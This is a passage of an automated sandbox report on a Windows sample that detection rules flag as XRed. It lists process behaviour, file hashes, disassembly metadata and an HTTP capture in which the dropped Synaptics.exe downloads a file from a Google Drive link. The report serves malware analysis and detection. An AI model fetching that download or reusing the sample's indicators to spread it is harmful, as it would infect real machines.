                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="aG6Sa3gEqp-dxsR6uzFdiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:47 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.1149877142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:46 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:46 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GtYJ6q8ay7LneNPyvFFcVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:1
                                                                                                                    Start time:07:18:18
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\1.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\1.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'101'824 bytes
                                                                                                                    MD5 hash:D0598443FA9984227105811E5D89B70F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:07:18:19
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\._cache_1.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\._cache_1.exe"
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:329'728 bytes
                                                                                                                    MD5 hash:8F02CCF024090E3BD52574174749C778
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:07:18:20
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:772'096 bytes
                                                                                                                    MD5 hash:065BECDE24188ED65E53BECB09A5A039
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 87%, ReversingLabs
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:07:18:21
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0xc70000
                                                                                                                    File size:53'161'064 bytes
                                                                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:14
                                                                                                                    Start time:07:18:39
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 2816
                                                                                                                    Imagebase:0xd20000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:34.1%
                                                                                                                      Total number of Nodes:41
                                                                                                                      Total number of Limit Nodes:3
                                                                                                                      execution_graph 13831 5225f2 13832 52261e 13831->13832 13833 522602 13831->13833 13833->13832 13835 522080 LdrInitializeThunk 13833->13835 13835->13832 13836 525450 13837 525469 13836->13837 13838 52548f 13836->13838 13837->13838 13842 522080 LdrInitializeThunk 13837->13842 13840 5254b8 13840->13838 13843 522080 LdrInitializeThunk 13840->13843 13842->13840 13843->13838 13884 5223c5 GetForegroundWindow 13888 524110 13884->13888 13886 5223d1 GetForegroundWindow 13887 5223ec 13886->13887 13889 524124 13888->13889 13889->13886 13895 51c1a6 13896 51c1aa 13895->13896 13898 51c1b2 13896->13898 13899 522080 LdrInitializeThunk 13896->13899 13899->13896 13849 522b3b 13851 522b45 13849->13851 13850 522c0e 13851->13850 13853 522080 LdrInitializeThunk 13851->13853 13853->13850 13859 4e8a60 13861 4e8a6f 13859->13861 13860 4e8d05 ExitProcess 13861->13860 13862 4e8a84 GetCurrentProcessId GetCurrentThreadId 13861->13862 13863 4e8cee 13861->13863 13865 4e8abd 13862->13865 13866 4e8ac3 SHGetSpecialFolderPathW GetForegroundWindow 13862->13866 13876 522000 13863->13876 13865->13866 13867 4e8b95 13866->13867 13873 5204b0 13867->13873 13869 4e8c27 13869->13863 13879 4ed400 CoInitializeEx 13869->13879 13880 523770 13873->13880 13875 5204ba RtlAllocateHeap 13875->13869 13882 523750 13876->13882 13878 522005 FreeLibrary 13878->13860 13881 5237a0 13880->13881 13881->13875 13881->13881 13883 523759 13882->13883 13883->13878

                                                                                                                      Executed Functions

                                                                                                                      Function 004E8A60 Relevance: 7.7, APIs: 5, Instructions: 216threadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004E8A84
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004E8A8E
                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004E8B76
                                                                                                                      • GetForegroundWindow.USER32 ref: 004E8B8B
                                                                                                                      • ExitProcess.KERNEL32 ref: 004E8D07
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4063528623-0
                                                                                                                      • Opcode ID: 4b904843f2912ef21b4d41ff99f8c42d9af38dae692026d0fcf994d1a5cce5d5
                                                                                                                      • Instruction ID: 563979189fded2e0dd7d44b4c0e86fd2f19d8dda541e80245efeef63773d0d03
                                                                                                                      • Opcode Fuzzy Hash: 4b904843f2912ef21b4d41ff99f8c42d9af38dae692026d0fcf994d1a5cce5d5
                                                                                                                      • Instruction Fuzzy Hash: A5617C73B143140BD718AE7ADC1A36A76D39FC5310F0F853EA995EB791ED7888068385
                                                                                                                      Function 00522080 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 38 522080-5220b2 LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      • LdrInitializeThunk.NTDLL(0052523A,?,00000018,?,?,00000018,?,?,?), ref: 005220AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                      Function 00521B50 Relevance: .1, Instructions: 110COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 67 521b50-521ba6 68 521bb0-521c04 67->68 68->68 69 521c06-521c16 68->69 71 521816-52186f 69->71 72 521c1c 69->72 73 521870-5218c3 71->73 73->73 74 5218c5-5218d0 73->74 75 5218d3-5218d5 74->75 76 521800-521813 75->76 77 5218db-5218e0 75->77 76->71 77->67
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b006a5bedfd6e41db02808d1fc51827bae392cf4bf9f62673e5043eff8febfa3
                                                                                                                      • Instruction ID: 04ee806b9a09f5fb3155a2345b08bcdec28f08339d173b479a7f3c1bee33e22b
                                                                                                                      • Opcode Fuzzy Hash: b006a5bedfd6e41db02808d1fc51827bae392cf4bf9f62673e5043eff8febfa3
                                                                                                                      • Instruction Fuzzy Hash: 7141F0B64587118BD314CF10D89135BFAE3AFD6304F19CA1DE8C55B384DAB5C10A8B86
                                                                                                                      Function 00521816 Relevance: .1, Instructions: 58COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 150 521816-52186f 151 521870-5218c3 150->151 151->151 152 5218c5-5218d0 151->152 153 5218d3-5218d5 152->153 154 521800-521813 153->154 155 5218db-521ba6 153->155 154->150 158 521bb0-521c04 155->158 158->158 159 521c06-521c16 158->159 159->150 161 521c1c 159->161
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6550d3913279a69f5389d0091dcb985c40984ec8ae160820b748a7f48e410ad1
                                                                                                                      • Instruction ID: 0231859c4c3ce178ae5061218e8a95355fa7953cc97fc802b933d86be0db9c7d
                                                                                                                      • Opcode Fuzzy Hash: 6550d3913279a69f5389d0091dcb985c40984ec8ae160820b748a7f48e410ad1
                                                                                                                      • Instruction Fuzzy Hash: 8B11BE751593018BD318CF64E8D136BFAA3AFD6348F18892DE08557385CAB4C10A8B56
                                                                                                                      Function 005223C5 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 005223C5
                                                                                                                      • GetForegroundWindow.USER32 ref: 005223E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ForegroundWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2020703349-0
                                                                                                                      • Opcode ID: 2fccf93c7f4b00589a29aef56dbc52653fffb784ba26c0671cc618efe61df12b
                                                                                                                      • Instruction ID: 8476a6eabb27a58e1f03eccf84f08047285528a41fddc390c71b02e15b063d62
                                                                                                                      • Opcode Fuzzy Hash: 2fccf93c7f4b00589a29aef56dbc52653fffb784ba26c0671cc618efe61df12b
                                                                                                                      • Instruction Fuzzy Hash: 8FD0A7B58028114BE2559760BC4E47F3A21AFB72053044414E40B01656FB31119FDE9E
                                                                                                                      Function 005204B0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 39 5204b0-5204c7 call 523770 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,004E8C27,FDFCE302), ref: 005204C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 55a074445ef61be0a8f6fb450b435f728a4e4652f8f076049a92f1836b47b3f2
                                                                                                                      • Instruction ID: 922dd129763f905e5854e6b869f90d4b3a588992078e6315a234ab5d17d4e868
                                                                                                                      • Opcode Fuzzy Hash: 55a074445ef61be0a8f6fb450b435f728a4e4652f8f076049a92f1836b47b3f2
                                                                                                                      • Instruction Fuzzy Hash: 4AC04871045121BACE102B24FC09BCA3E68EF96262F068096B004A61B18660AD829A94
                                                                                                                      Function 00522000 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 42 522000-522011 call 523750 FreeLibrary
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNELBASE(004E8D05), ref: 0052200B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: 2a07481609366d183938e470d892a1cfa053a14427f45c459eb50b85f0795173
                                                                                                                      • Instruction ID: 1bc6c7e6c85768956ae83bca09816b7fb532db721fcd267fe3f936a81062d095
                                                                                                                      • Opcode Fuzzy Hash: 2a07481609366d183938e470d892a1cfa053a14427f45c459eb50b85f0795173
                                                                                                                      • Instruction Fuzzy Hash: B9A001B44100129A8E256B30AD8F6083E62BEA23417140850A546A18718A25561AAA44

                                                                                                                      Non-executed Functions

                                                                                                                      Function 004F27E0 Relevance: 183.9, APIs: 3, Strings: 101, Instructions: 1937COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
                                                                                                                      • API String ID: 0-299570860
                                                                                                                      • Opcode ID: e6f797b23c4692ac601846a12a2888f2b609146eef780aa0e57ab4b649d34257
                                                                                                                      • Instruction ID: 5d1668a25e5e8c15ae24d3eb63c8cf4aa89704704f2af788f0ee10ac874bb6c5
                                                                                                                      • Opcode Fuzzy Hash: e6f797b23c4692ac601846a12a2888f2b609146eef780aa0e57ab4b649d34257
                                                                                                                      • Instruction Fuzzy Hash: A403CE7050C7C48ED3259B3884883AFBFD1ABD2314F188A6EE6E9873D2D77985468717
                                                                                                                      Function 004FDE90 Relevance: 123.7, Strings: 98, Instructions: 1234COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
                                                                                                                      • API String ID: 0-1873956536
                                                                                                                      • Opcode ID: da0fc707760e0164ee71e2d17d2938b6c65ea99efd54ad21c71876e0928d22f4
                                                                                                                      • Instruction ID: 62d0806edd13e783eb49995863f597a82f8991a6fdfeb500e786e3b611c89115
                                                                                                                      • Opcode Fuzzy Hash: da0fc707760e0164ee71e2d17d2938b6c65ea99efd54ad21c71876e0928d22f4
                                                                                                                      • Instruction Fuzzy Hash: 26B2AD3160C3C48FD325CA38C8543AFBBD1ABD6314F184A6DE5E98B3D2D6B998098757
                                                                                                                      Function 0050621B Relevance: 33.7, Strings: 26, Instructions: 1202COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
